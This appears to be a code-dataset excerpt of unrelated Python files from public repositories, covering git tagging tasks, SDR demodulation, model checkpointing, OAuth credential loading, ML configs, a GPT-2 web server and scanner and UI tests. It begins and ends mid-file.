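#     privc = get_datautils('privc')
#     privc.decrypt(list(privc.encrypt(-0.5)))    # reveals ~-0.5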
|
tasks.py
|
gohar94/nums
| 111 |
121471
|
"""Command-line tools to facilitate the development of NumS."""
from invoke import task
from nums.core.version import __version__
@task
def tag(c):
"""Tag the current version of NumS and push the tag upstream."""
result = c.run("git tag", hide=True)
versions = result.stdout.splitlines()
current_version = "v" + __version__
if current_version in versions:
if not accepts(f"{current_version} is already tagged. Force update?"):
return
c.run(f"git tag {current_version} -f")
c.run("git push --tags -f")
else:
if not accepts(f"Tag {current_version} and push upstream?"):
return
c.run(f"git tag {current_version}")
c.run("git push --tags")
def accepts(message: str) -> bool:
"""Ask the user to respond 'y' or 'n' to the specified prompt.
If the user supplies an invalid response (i.e., neither 'y' nor 'n'), then
the user is re-asked the question.
Args:
message: The question to ask the user.
Returns:
True if the user responds 'y' and False if the user responds 'n'.
"""
response = None
while response not in {"y", "n"}:
print(f"{message} (y/n)", end=" ")
response = input()
assert response in {"y", "n"}
return response == "y"
|
qf_lib/backtesting/events/time_event/single_time_event/schedule_order_execution_event.py
|
webclinic017/qf-lib
| 198 |
121482
|
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import defaultdict
from datetime import datetime
from typing import Dict, List
from qf_lib.backtesting.events.time_event.single_time_event.single_time_event import SingleTimeEvent
from qf_lib.backtesting.execution_handler.simulated_executor import SimulatedExecutor
from qf_lib.backtesting.order.order import Order
class ScheduleOrderExecutionEvent(SingleTimeEvent):
_datetimes_to_data = defaultdict(lambda: defaultdict(list)) # type: Dict[datetime, Dict[SimulatedExecutor, List[Order]]]
@classmethod
def schedule_new_event(cls, date_time: datetime, executor_to_orders_dict: Dict[SimulatedExecutor, List[Order]]):
"""
Schedules new event by adding the (date_time, data) pair to the _datetimes_to_data dictionary.
It assumes data has the structure of a dictionary, mapping order executor instances to the orders
that need to be executed.
Multiple events can be scheduled for the same time - the orders and order executors will be appended to
existing data.
"""
for order_executor in executor_to_orders_dict.keys():
cls._datetimes_to_data[date_time][order_executor].extend(executor_to_orders_dict[order_executor])
def notify(self, listener) -> None:
"""
Notifies the listener.
"""
listener.on_orders_accept(self)
@classmethod
def get_executors_to_orders_dict(cls, time: datetime) -> Dict[SimulatedExecutor, List[Order]]:
"""
For an initialized object representing a certain single time event, returns the data associated with this event
in the form of a dictionary, with SimulatedExecutor as keys and list of Orders as values.
"""
return cls._datetimes_to_data[time]
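# Usage sketch (illustrative): schedule orders for a point in simulated time and
# read them back when the event fires. `executor` stands for a SimulatedExecutor
# instance and `orders` for a list of Order objects created elsewhere.
#
#     t = datetime(2020, 1, 2, 9, 30)
#     ScheduleOrderExecutionEvent.schedule_new_event(t, {executor: orders})
#     ScheduleOrderExecutionEvent.get_executors_to_orders_dict(t)   # {executor: orders}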
|
mirage/libs/common/sdr/demodulators.py
|
tlechien/mirage
| 123 |
121491
|
from mirage.libs.common.sdr.sources import SDRSource
from mirage.libs.common.sdr.decoders import SDRDecoder
from mirage.libs import utils,io
import queue,threading,math
'''
This component implements multiple Software Defined Radio demodulators, allowing an IQ stream to be demodulated in order to recover packets' data.
'''
class SDRDemodulator:
'''
This class implements a Software Defined Radio demodulator: every specific demodulator has to inherit from this class and implement the ``run`` method.
When the demodulator is started, it processes the IQ stream received from the ``SDRSource``, performs the operations needed to demodulate the stream and adds the demodulated packets to the output queue using the ``generateOutput`` method.
'''
def __init__(self):
self.source = None
self.count = 0
self.decoders = []
self.running = False
self.output = queue.Queue()
def setSource(self,source):
'''
This method associates a ``SDRSource`` to the demodulator.
:param source: source to associate
:type source: ``SDRSource``
'''
if isinstance(source,SDRSource):
self.source = source
def addDecoder(self,decoder):
'''
This method associates a ``SDRDecoder`` to the demodulator.
:param decoder: decoder to associate
:type decoder: ``SDRDecoder``
'''
if isinstance(decoder, SDRDecoder):
self.decoders.append(decoder)
def getDecoders(self):
return self.decoders
def removeDecoders(self):
'''
This method removes every associated decoder.
'''
self.decoders = []
def generateOutput(self,demodulatedData,iqSamples):
'''
This method generates an output entry from the provided demodulated data and the corresponding IQ samples.
The output is processed sequentially by every associated decoder, then added to the output queue.
:param demodulatedData: demodulated data
:type demodulatedData: bytes
:param iqSamples: IQ samples linked to the demodulated data
:type iqSamples: list of complex
'''
for d in self.decoders:
demodulatedData,iqSamples = d.decode(demodulatedData, iqSamples)
if demodulatedData is not None and iqSamples is not None:
self.output.put((demodulatedData,iqSamples))
def getOutput(self):
'''
This method returns the next demodulated and decoded element from the output queue.
:return: tuple of the demodulated data and the corresponding IQ samples
:rtype: (bytes, list of complex)
'''
if not self.output.empty():
return self.output.get()
else:
return None
def start(self):
'''
This method starts the demodulator.
:Example:
>>> demodulator.start()
'''
self.thread = threading.Thread(target=self.run,daemon=True)
self.running = True
self.thread.start()
def __del__(self):
self.stop()
def stop(self):
'''
This method stops the demodulator.
:Example:
>>> demodulator.stop()
'''
self.running = False
def run(self):
pass
class FSK2Demodulator(SDRDemodulator):
'''
This demodulator demodulates a 2-Frequency Shift Keying (2-FSK) stream.
'''
def __init__(self,samplesPerSymbol=1,samplesBefore=60 , samplesAfter=60,size=8*40,preamble = "01101011011111011001000101110001"):
super().__init__()
self.samplesPerSymbol = samplesPerSymbol
self.samplesBefore = samplesBefore
self.samplesAfter = samplesAfter
self.size = size
self.preamble = preamble
self.numberOfBuffers = samplesPerSymbol
self.demodBuffer = ["" for i in range(samplesPerSymbol)]
def run(self):
i = 0
step = 0
if self.source.running:
while i >= len(self.source.iqStream) and self.running:
utils.wait(seconds=0.001)
while self.running:
if i < len(self.source.iqStream):
i0 = self.source.iqStream[i-1].real
q0 = self.source.iqStream[i-1].imag
i1 = self.source.iqStream[i].real
q1 = self.source.iqStream[i].imag
self.demodBuffer[step] += "1" if math.atan2(i0*q1 - q0*i1,i0*i1+q0*q1) > 0 else "0"
if len(self.demodBuffer[step]) >= len(self.preamble):
if self.preamble != self.demodBuffer[step][:len(self.preamble)]:
self.demodBuffer[step] = self.demodBuffer[step][1:]
else:
if len(self.demodBuffer[step]) == self.size:
demodulatedBlock = self.demodBuffer[step]
iqBlock = self.source.iqStream[(i-1)-((self.size-1)*self.numberOfBuffers)-self.samplesBefore:i+self.samplesAfter]
self.generateOutput(demodulatedBlock,iqBlock)
self.source.iqStream = self.source.iqStream[i+1:]
i = 1
self.count += 1
for j in range(self.numberOfBuffers):
self.demodBuffer[j] = ""
step = (step + 1) % self.numberOfBuffers
i += 1
else:
self.running = False
class FasterFSK2Demodulator(SDRDemodulator):
'''
This **experimental** demodulator demodulates a 2-Frequency Shift Keying stream.
It is based on an amplitude filter, which estimates the noise level and demodulates the stream only if the amplitude is above the noise threshold.
The main objective of this implementation is to increase the demodulator's speed; however, it may miss some packets if the noise threshold is wrong.
'''
def __init__(self,samplesPerSymbol=1,samplesBefore=60 , samplesAfter=60,size=8*40,preamble = "01101011011111011001000101110001"):
super().__init__()
self.samplesPerSymbol = samplesPerSymbol
self.samplesBefore = samplesBefore
self.samplesAfter = samplesAfter
self.size = size
self.noiseThresold = None
self.preamble = preamble
self.numberOfBuffers = samplesPerSymbol
self.noiseLevel = 0
self.noiseState = []
self.demodBuffer = ["" for i in range(samplesPerSymbol)]
def stop(self):
self.running = False
self.noiseLevel = 0
self.noiseThresold = None
def run(self):
i = 0
step = 0
demodulating = False
demodulatingCount = 0
if self.source.running:
while i >= len(self.source.iqStream) and self.running:
utils.wait(seconds=0.00001)
while self.running:
if i < len(self.source.iqStream):
if not demodulating:
increment = (self.size*self.numberOfBuffers) // 2
if self.noiseThresold is None:
values = []
for j in range(increment,self.source.blockLength // 2,increment):
values += [self.source.iqStream[j].imag*self.source.iqStream[j].imag+self.source.iqStream[j].real*self.source.iqStream[j].real]
self.noiseThresold = sum(values)/len(values)
#io.info("<Experimental Demodulator> Noise thresold: "+str(self.noiseThresold))
else:
amplitude = self.source.iqStream[i].real*self.source.iqStream[i].real+self.source.iqStream[i].imag*self.source.iqStream[i].imag
if len(self.noiseState) == 10:
if self.noiseState.count(False) > self.noiseState.count(True):
self.noiseLevel += 0.25
self.noiseState = []
if amplitude > self.noiseThresold*self.noiseLevel:
if i - increment > 1:
demodulatingCount = self.size * self.numberOfBuffers * 2
demodulating = True
i -= increment
self.source.iqStream = self.source.iqStream[i-self.samplesBefore:] # test !!!
i = self.samplesBefore
else:
i += increment
else:
i += increment
else:
i0 = self.source.iqStream[i-1].real
q0 = self.source.iqStream[i-1].imag
i1 = self.source.iqStream[i].real
q1 = self.source.iqStream[i].imag
self.demodBuffer[step] += "1" if math.atan2(i0*q1 - q0*i1,i0*i1+q0*q1) > 0 else "0"# (i0*q1 - i1*q0)
if len(self.demodBuffer[step]) >= len(self.preamble):
if self.preamble != self.demodBuffer[step][:len(self.preamble)]:
self.demodBuffer[step] = self.demodBuffer[step][1:]
else:
if len(self.demodBuffer[step]) == self.size:
demodulatedBlock = self.demodBuffer[step]
iqBlock = self.source.iqStream[(i-1)-((self.size-1)*self.numberOfBuffers)-self.samplesBefore:i+self.samplesAfter]
self.generateOutput(demodulatedBlock,iqBlock)
self.source.iqStream = self.source.iqStream[i+1:]
i = 1
self.count += 1
self.noiseState.append(True)
for j in range(self.numberOfBuffers):
self.demodBuffer[j] = ""
demodulating = False
step = (step + 1) % self.numberOfBuffers
i += 1
demodulatingCount -= 1
if demodulatingCount <= 0:
self.noiseState.append(False)
for j in range(self.numberOfBuffers):
self.demodBuffer[j] = ""
demodulating = False
self.running = False
else:
self.running = False
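# Usage sketch (illustrative): wire a source, a demodulator and optional decoders
# together, then poll for demodulated packets. `source` stands for any concrete
# ``SDRSource`` implementation and `decoder` for an ``SDRDecoder`` instance.
#
#     demodulator = FSK2Demodulator(samplesPerSymbol=1)
#     demodulator.setSource(source)
#     demodulator.addDecoder(decoder)
#     demodulator.start()
#     packet = demodulator.getOutput()   # None until a packet has been demodulated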
|
util/model_saver.py
|
segcv/CascadePSP
| 606 |
121520
|
import os
import torch
class ModelSaver:
def __init__(self, id):
if id is None:
self.no_log = True
print('Saving has been disabled.')
else:
self.no_log = False
self.save_path = os.path.join('.', 'weights', '%s' % id )
def save_model(self, model, step):
if self.no_log:
print('Saving has been disabled.')
return
os.makedirs(self.save_path, exist_ok=True)
model_path = os.path.join(self.save_path, 'model_%s' % step)
torch.save(model.state_dict(), model_path)
print('Model saved to %s.' % model_path)
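# Usage sketch (illustrative): checkpoint a network periodically during training.
# `model` and `loader` are placeholders for the actual network and data loader.
#
#     saver = ModelSaver('run_001')              # weights go to ./weights/run_001/
#     for step, batch in enumerate(loader):
#         ...
#         if step % 10000 == 0:
#             saver.save_model(model, step)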
|
tests/unit/test_threads.py
|
dia38/pylink
| 217 |
121558
|
# Copyright 2017 Square, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pylink.threads as threads
import unittest
class TestThreads(unittest.TestCase):
"""Unit test for the `threads` submodule."""
def setUp(self):
"""Called before each test.
Performs setup.
Args:
self (TestThreads): the `TestThreads` instance
Returns:
`None`
"""
pass
def tearDown(self):
"""Called after each test.
Performs teardown.
Args:
self (TestThreads): the `TestThreads` instance
Returns:
`None`
"""
pass
def test_thread(self):
"""Tests that a thread can be created and joined for a return value.
Args:
self (TestThreads): the `TestThreads` instance
Returns:
`None`
"""
def thread_func():
return 4
def thread_func_with_args(x, y):
return (x + y)
thread = threads.ThreadReturn(target=thread_func)
thread.start()
self.assertEqual(4, thread.join())
thread = threads.ThreadReturn(target=thread_func_with_args, args=(2, 3))
thread.start()
self.assertEqual(5, thread.join())
if __name__ == '__main__':
unittest.main()
|
ui/operator_ui/oauth.py
|
Prototik/postgres-operator
| 2,061 |
121564
|
import os
from flask_oauthlib.client import OAuthRemoteApp
CREDENTIALS_DIR = os.getenv('CREDENTIALS_DIR', '')
class OAuthRemoteAppWithRefresh(OAuthRemoteApp):
'''Same as flask_oauthlib.client.OAuthRemoteApp, but always loads client credentials from file.'''
def __init__(self, oauth, name, **kwargs):
# constructor expects some values, so make it happy..
kwargs['consumer_key'] = 'not-needed-here'
kwargs['consumer_secret'] = 'not-needed-here'
OAuthRemoteApp.__init__(self, oauth, name, **kwargs)
def refresh_credentials(self):
with open(os.path.join(CREDENTIALS_DIR, 'authcode-client-id')) as fd:
self._consumer_key = fd.read().strip()
with open(os.path.join(CREDENTIALS_DIR, 'authcode-client-secret')) as fd:
self._consumer_secret = fd.read().strip()
@property
def consumer_key(self):
self.refresh_credentials()
return self._consumer_key
@property
def consumer_secret(self):
self.refresh_credentials()
return self._consumer_secret
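# Usage sketch (illustrative): register the remote app on a Flask-OAuthlib OAuth
# object; the client id/secret are re-read from CREDENTIALS_DIR on every access.
# The URLs below are placeholders taken from the environment.
#
#     oauth = OAuth(app)
#     auth = OAuthRemoteAppWithRefresh(
#         oauth, 'auth',
#         request_token_url=None,
#         access_token_url=os.getenv('ACCESS_TOKEN_URL'),
#         authorize_url=os.getenv('AUTHORIZE_URL'))
#     oauth.remote_apps['auth'] = auth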
|
robot-server/robot_server/service/protocol/environment.py
|
knownmed/opentrons
| 235 |
121565
|
import os
import sys
from robot_server.service.protocol import contents
from contextlib import contextmanager
@contextmanager
def protocol_environment(protocol: contents.Contents):
"""
Context manager used for setting up an environment to run an
UploadProtocol.
"""
old_cwd = os.getcwd()
# Change working directory to temp dir
os.chdir(protocol.directory.name)
# Add temp dir to path after caching path
old_path = sys.path.copy()
sys.path.append(protocol.directory.name)
try:
yield contents
finally:
os.chdir(old_cwd)
sys.path = old_path
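# Usage sketch (illustrative): run uploaded protocol code with the protocol's
# temporary directory as the working directory and as an extra import root.
# `source` and `filename` are placeholders for the uploaded protocol contents.
#
#     with protocol_environment(protocol):
#         exec(compile(source, filename, 'exec'), {})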
|
fna_det/tools/hooks/optimizer.py
|
BaiYuYuan/FNA
| 173 |
121570
|
import torch
from mmcv.runner import OptimizerHook
from mmdet.core.utils.dist_utils import allreduce_grads
from collections import OrderedDict
import torch.distributed as dist
from torch._utils import (_flatten_dense_tensors, _unflatten_dense_tensors,
_take_tensors)
class ArchOptimizerHook(OptimizerHook):
def after_train_iter(self, runner):
runner.arch_optimizer.zero_grad()
if runner.sub_obj_cfg.if_sub_obj:
loss_sub_obj = torch.log(runner.outputs['sub_obj']) / \
torch.log(torch.tensor(runner.sub_obj_cfg.log_base))
runner.outputs['loss'] += loss_sub_obj * runner.sub_obj_cfg.sub_loss_factor
runner.outputs['loss'].backward()
if self.grad_clip is not None:
self.clip_grads(runner.model.parameters())
runner.arch_optimizer.step()
self.rescale_arch_params(runner.super_backbone)
def rescale_arch_params(self, model):
"""
Rescale the architecture parameters,
i.e. add the rescale_value (bias) to the updated architecture parameters
in order to maintain the magnitude of the softmax outputs of the non-updated params.
"""
def comp_rescale_value(old_weights, new_weights, index, block_id, branch_id):
old_exp_sum = old_weights.exp().sum()
new_drop_arch_params = [new_weights[block_id][branch_id][h_idx] for h_idx in index]
new_exp_sum = torch.stack(new_drop_arch_params).exp().sum()
rescale_value = torch.log(old_exp_sum / new_exp_sum)
return rescale_value
if hasattr(model, 'module'):
model = model.module
alpha_head_index = model.alpha_head_index
alpha_head_weights_drop = model.alpha_head_weights_drop
alpha_stack_index = model.alpha_stack_index
alpha_stack_weights_drop = model.alpha_stack_weights_drop
# rescale the arch params for head layers
for i, (alpha_head_weights_drop_block, alpha_head_index_block) in enumerate(
zip(alpha_head_weights_drop, alpha_head_index)):
for j, (alpha_head_weights_drop_branch, alpha_head_index_branch) in enumerate(
zip(alpha_head_weights_drop_block, alpha_head_index_block)):
rescale_value = comp_rescale_value(alpha_head_weights_drop_branch,
model.alpha_head_weights,
alpha_head_index_branch, i, j)
for idx in alpha_head_index_branch:
model.alpha_head_weights[i].data[j][idx] += rescale_value
# rescale the arch params for stack layers
for i, (alpha_stack_weights_drop_block, alpha_stack_index_block) in enumerate(
zip(alpha_stack_weights_drop, alpha_stack_index)):
for j, (alpha_stack_weights_drop_branch, alpha_stack_index_branch) in enumerate(
zip(alpha_stack_weights_drop_block, alpha_stack_index_block)):
rescale_value = comp_rescale_value(alpha_stack_weights_drop_branch,
model.alpha_stack_weights,
alpha_stack_index_branch, i, j)
for idx in alpha_stack_index_branch:
model.alpha_stack_weights[i].data[j][idx] += rescale_value
class ArchDistOptimizerHook(ArchOptimizerHook):
def __init__(self, grad_clip=None, coalesce=True, bucket_size_mb=-1):
self.grad_clip = grad_clip
self.coalesce = coalesce
self.bucket_size_mb = bucket_size_mb
def after_train_iter(self, runner):
runner.arch_optimizer.zero_grad()
if runner.sub_obj_cfg.if_sub_obj:
loss_sub_obj = torch.log(runner.outputs['sub_obj']) / \
torch.log(torch.tensor(runner.sub_obj_cfg.log_base))
runner.outputs['loss'] += loss_sub_obj * runner.sub_obj_cfg.sub_loss_factor
runner.outputs['loss'].backward()
allreduce_grads(runner.model, self.coalesce, self.bucket_size_mb)
if self.grad_clip is not None:
self.clip_grads(runner.model.parameters())
runner.arch_optimizer.step()
# self.rescale_arch_params(runner.super_backbone)
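# Illustrative sketch (not part of the training flow above): the rescale value
# computed in `comp_rescale_value` is log(sum(exp(old)) / sum(exp(kept_new))),
# so adding it to the kept logits restores the exp-sum of the original vector.
if __name__ == '__main__':
    old = torch.tensor([0.2, -0.1, 0.4])
    new_kept = torch.tensor([0.25, 0.35])    # e.g. one branch was dropped
    rescale = torch.log(old.exp().sum() / new_kept.exp().sum())
    # exp-sum of the rescaled kept logits equals exp-sum of `old`
    print((new_kept + rescale).exp().sum(), old.exp().sum())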
|
InnerEye/ML/configs/segmentation/HeadAndNeckPaper.py
|
JacopoTeneggi/InnerEye-DeepLearning
| 402 |
121590
|
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
import logging
import random
from typing import Any, Optional
from InnerEye.ML.config import SliceExclusionRule, SummedProbabilityRule, equally_weighted_classes
from InnerEye.ML.configs.segmentation.HeadAndNeckBase import HeadAndNeckBase
from InnerEye.ML.utils.model_metadata_util import generate_random_colours_list
# List of structures to segment. The order is important, because different values of num_structures
# in the constructor will select different prefixes of the list.
STRUCTURE_LIST = ["external", "parotid_l", "parotid_r", "smg_l", "smg_r", "spinal_cord", "brainstem",
"globe_l", "globe_r", "mandible", "spc_muscle", "mpc_muscle", "cochlea_l", "cochlea_r",
"lens_l", "lens_r", "optic_chiasm", "optic_nerve_l", "optic_nerve_r", "pituitary_gland",
"lacrimal_gland_l", "lacrimal_gland_r"]
RANDOM_COLOUR_GENERATOR = random.Random(0)
COLOURS = generate_random_colours_list(RANDOM_COLOUR_GENERATOR, len(STRUCTURE_LIST))
class HeadAndNeckPaper(HeadAndNeckBase):
"""
Head and Neck model, as used in the paper.
"""
def __init__(self, num_structures: Optional[int] = None, **kwargs: Any) -> None:
"""
Creates a new instance of the class.
:param num_structures: number of structures from STRUCTURE_LIST to predict (default: all structures)
:param kwargs: Additional arguments that will be passed through to the SegmentationModelBase constructor.
"""
# Number of structures to predict; if positive but less than the length of STRUCTURE_LIST, the relevant prefix
# of STRUCTURE_LIST will be predicted.
if (num_structures is not None) and \
(num_structures <= 0 or num_structures > len(STRUCTURE_LIST)):
raise ValueError(f"num structures must be between 0 and {len(STRUCTURE_LIST)}")
if num_structures is None:
logging.info(f'Setting num_structures to: {len(STRUCTURE_LIST)}')
num_structures = len(STRUCTURE_LIST)
ground_truth_ids = STRUCTURE_LIST[:num_structures]
if "ground_truth_ids_display_names" in kwargs:
ground_truth_ids_display_names = kwargs.pop("ground_truth_ids_display_names")
else:
logging.info('Using default ground_truth_ids_display_names')
ground_truth_ids_display_names = [f"zz_{x}" for x in ground_truth_ids]
if "colours" in kwargs:
colours = kwargs.pop("colours")
else:
logging.info('Using default colours')
colours = COLOURS[:num_structures]
if "fill_holes" in kwargs:
fill_holes = kwargs.pop("fill_holes")
else:
logging.info('Using default fill_holes')
fill_holes = [True] * num_structures
# The amount of GPU memory required increases with both the number of structures and the
# number of feature channels. The following is a sensible default to avoid out-of-memory,
# but you can override it by passing in another value for num_feature_channels
# from a subclass.
if "num_feature_channels" in kwargs:
num_feature_channels = kwargs.pop("num_feature_channels")
else:
logging.info('Using default num_feature_channels')
num_feature_channels = 32 if num_structures <= 20 else 26
bg_weight = 0.02 if len(ground_truth_ids) > 1 else 0.25
if "class_weights" in kwargs:
class_weights = kwargs.pop("class_weights")
else:
logging.info('Using default class_weights')
class_weights = equally_weighted_classes(ground_truth_ids, background_weight=bg_weight)
# In case of vertical overlap between brainstem and spinal_cord, we separate them
# by converting brainstem voxels to cord, as the latter is clinically more sensitive.
# We do the same to separate SPC and MPC; in this case, the direction of change is unimportant,
# so we choose SPC-to-MPC arbitrarily.
if "slice_exclusion_rules" in kwargs:
slice_exclusion_rules = kwargs.pop("slice_exclusion_rules")
else:
logging.info('Using default slice_exclusion_rules')
slice_exclusion_rules = []
if "brainstem" in ground_truth_ids and "spinal_cord" in ground_truth_ids:
slice_exclusion_rules.append(SliceExclusionRule("brainstem", "spinal_cord", False))
if "spc_muscle" in ground_truth_ids and "mpc_muscle" in ground_truth_ids:
slice_exclusion_rules.append(SliceExclusionRule("spc_muscle", "mpc_muscle", False))
if "optic_chiasm" in ground_truth_ids and "pituitary_gland" in ground_truth_ids:
slice_exclusion_rules.append(SliceExclusionRule("optic_chiasm", "pituitary_gland", True))
if "summed_probability_rules" in kwargs:
summed_probability_rules = kwargs.pop("summed_probability_rules")
else:
logging.info('Using default summed_probability_rules')
summed_probability_rules = []
if "brainstem" in ground_truth_ids and "spinal_cord" in ground_truth_ids and \
"external" in ground_truth_ids:
summed_probability_rules.append(SummedProbabilityRule("spinal_cord", "brainstem", "external"))
if "spc_muscle" in ground_truth_ids and "mpc_muscle" in ground_truth_ids and \
"external" in ground_truth_ids:
summed_probability_rules.append(SummedProbabilityRule("mpc_muscle", "spc_muscle", "external"))
if "optic_chiasm" in ground_truth_ids and "pituitary_gland" in ground_truth_ids and \
"external" in ground_truth_ids:
summed_probability_rules.append(SummedProbabilityRule("optic_chiasm", "pituitary_gland", "external"))
super().__init__(
ground_truth_ids=ground_truth_ids,
ground_truth_ids_display_names=ground_truth_ids_display_names,
colours=colours,
fill_holes=fill_holes,
class_weights=class_weights,
slice_exclusion_rules=slice_exclusion_rules,
summed_probability_rules=summed_probability_rules,
num_feature_channels=num_feature_channels,
**kwargs)
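# Usage sketch (illustrative): build a configuration that predicts only the first
# ten structures in STRUCTURE_LIST, relying on the defaults derived above for
# display names, colours, class weights and exclusion rules.
#
#     config = HeadAndNeckPaper(num_structures=10)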
|
src/schnetpack/md/utils/__init__.py
|
giadefa/schnetpack
| 450 |
121598
|
"""
This module contains various utility functions and classes used in combination with :obj:`schnetpack.md`.
This includes e.g. unit conversion, loading of molecular dynamics data and the computation of spectra.
"""
from .basic_utils import *
from .md_units import *
from .hdf5_data import *
from .normal_mode_transformation import *
from .spectra import *
from .thermostat_utils import *
|
examples/hacker_news_app.py
|
dalraf/gpt-2-cloud-run
| 298 |
121642
|
from starlette.applications import Starlette
from starlette.responses import UJSONResponse
import gpt_2_simple as gpt2
import uvicorn
import os
app = Starlette(debug=False)
sess = gpt2.start_tf_sess(threads=1)
gpt2.load_gpt2(sess)
@app.route('/', methods=['GET', 'POST'])
async def homepage(request):
if request.method == 'GET':
params = request.query_params
elif request.method == 'POST':
params = await request.json()
text = gpt2.generate(sess,
length=100,
temperature=float(params.get('temperature', 0.7)),
top_k=int(params.get('top_k', 0)),
prefix='<|startoftext|>' + params.get('prefix', ''),
truncate='<|endoftext|>',
include_prefix=str(params.get(
'include_prefix', True)).lower() == 'true',
return_as_list=True
)[0]
# strip <|startoftext|>
text = text[len('<|startoftext|>'):]
return UJSONResponse({'text': text})
if __name__ == '__main__':
uvicorn.run(app, host='0.0.0.0', port=int(os.environ.get('PORT', 8080)))
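# Usage sketch (illustrative): once the server is running, text can be requested
# with a plain GET, e.g.
#
#     curl "http://localhost:8080/?prefix=Show+HN:&temperature=0.8&top_k=40"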
|
nni/retiarii/debug_configs.py
|
dutxubo/nni
| 9,680 |
121670
|
# we will support tensorflow in future release
framework = 'pytorch'
|
module/gui/geoLGobal.py
|
Appnet1337/OSINT-SAN
| 313 |
121705
|
import os
dirpath = os.getcwd()
print("Current working directory is : %s" % dirpath)
APP_NAME = 'OSINT SAN Geolocation'
#------<IMAGES PATH>-------------------------------------------------------------
IMG_FD = 'img'
ICO_PATH = os.path.join(dirpath, IMG_FD, "geoIcon.ico")
BGIMG_PATH = os.path.join(dirpath, IMG_FD, "background.jpg")
DC_POS_PATH = os.path.join(dirpath, "awsRecord.txt")
#-------<GLOBAL PARAMETERS>-----------------------------------------------------
iCtrlPanel = None # panel to do the control
iMapPanel = None # panel to display the google map.
iGeoMgr = None # program control manager.
iDCPosMgr = None # data center position manager.
|
tests/terraform/checks/resource/azure/test_FunctionAppsEnableAuthentication.py
|
kylelaker/checkov
| 4,013 |
121708
|
import unittest
import hcl2
from checkov.terraform.checks.resource.azure.FunctionAppsEnableAuthentication import check
from checkov.common.models.enums import CheckResult
class TestFunctionAppsEnableAuthentication(unittest.TestCase):
def test_failure_missing_authentication_block(self):
hcl_res = hcl2.loads("""
resource "azurerm_function_app" "example" {
name = "test-azure-functions"
location = "azurerm_resource_group.example.location"
resource_group_name = "azurerm_resource_group.example.name"
app_service_plan_id = "azurerm_app_service_plan.example.id"
storage_account_name = "azurerm_storage_account.example.name"
storage_account_access_key = "azurerm_storage_account.example.primary_access_key"
}
""")
resource_conf = hcl_res['resource'][0]['azurerm_function_app']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_success(self):
hcl_res = hcl2.loads("""
resource "azurerm_function_app" "example" {
name = "test-azure-functions"
location = "azurerm_resource_group.example.location"
resource_group_name = "azurerm_resource_group.example.name"
app_service_plan_id = "azurerm_app_service_plan.example.id"
storage_account_name = "azurerm_storage_account.example.name"
storage_account_access_key = "azurerm_storage_account.example.primary_access_key"
auth_settings {
enabled = true
}
}
""")
resource_conf = hcl_res['resource'][0]['azurerm_function_app']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
def test_failed(self):
hcl_res = hcl2.loads("""
resource "azurerm_function_app" "example" {
name = "test-azure-functions"
location = "azurerm_resource_group.example.location"
resource_group_name = "azurerm_resource_group.example.name"
app_service_plan_id = "azurerm_app_service_plan.example.id"
storage_account_name = "azurerm_storage_account.example.name"
storage_account_access_key = "azurerm_storage_account.example.primary_access_key"
auth_settings {
enabled = false
}
}
""")
resource_conf = hcl_res['resource'][0]['azurerm_function_app']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
if __name__ == '__main__':
unittest.main()
|
dirigible/fts/tests/test_2546_ListSheetsOnDashboard.py
|
EnoX1/dirigible-spreadsheet
| 168 |
121800
|
# Copyright (c) 2010 Resolver Systems Ltd.
# All Rights Reserved
#
from functionaltest import FunctionalTest, SERVER_IP, snapshot_on_error
import key_codes
class Test_2546_ListSheetsOnDashboard(FunctionalTest):
def rename_current_sheet(self, name):
self.selenium.click('id=id_sheet_name')
self.wait_for(
lambda: self.is_element_present('id=edit-id_sheet_name'),
lambda: 'edit sheetname textbox to appear')
self.selenium.type('id=edit-id_sheet_name', name)
self.human_key_press(key_codes.ENTER)
self.wait_for_element_presence('id=saving-id_sheet_name', False)
def assert_sheet_is_listed(self, sheet_id, sheet_name=None):
if sheet_name is None:
sheet_name = 'Sheet %s' % (sheet_id,)
expected_url = '/user/%s/sheet/%s/' % (self.get_my_username(), sheet_id)
link_text = self.get_text(
'css=a[href="%s"]' % (expected_url,))
# "xpath=//a[contains(@href, '%s')]" % (expected_url,))
self.assertEquals(link_text, sheet_name)
@snapshot_on_error
def test_list_exists(self):
# * Harold logs in to Dirigible.
self.login()
# * He notes that he is being told that he has no sheets.
self.assertTrue(
self.is_element_present('id=id_no_sheets_message'),
"Could not find 'no sheets' message"
)
# * He decides that he wants one, so he clicks on a button to create it.
sheet1_id = self.create_new_sheet()
# * He clicks 'my account' and goes back to dashboard page
# * His new sheet is listed there, with a link to it
self.click_link('id_account_link')
self.assert_sheet_is_listed(sheet1_id)
# He notes that the "no sheets" message is absent.
self.assertFalse(
self.is_element_present('id=id_no_sheets_message'),
"Found 'no sheets' message when it wasn't expected"
)
# * He clicks new sheet again
sheet2_id = self.create_new_sheet()
# * He renames the second sheet
self.rename_current_sheet('Snarf')
# * He clicks 'my account' and goes back to dashboard page
self.click_link('id_account_link')
# * Both sheets are listed there
self.assert_sheet_is_listed(sheet1_id)
self.assert_sheet_is_listed(sheet2_id, 'Snarf')
|
src/optlang/tests/test_coinor_cbc_interface.py
|
Wealing/optlang
| 140 |
121826
|
# Copyright (c) 2013 Novo Nordisk Foundation Center for Biosustainability, DTU.
# See LICENSE for details.
import unittest
import json
import os
import optlang.interface
import pickle
import copy
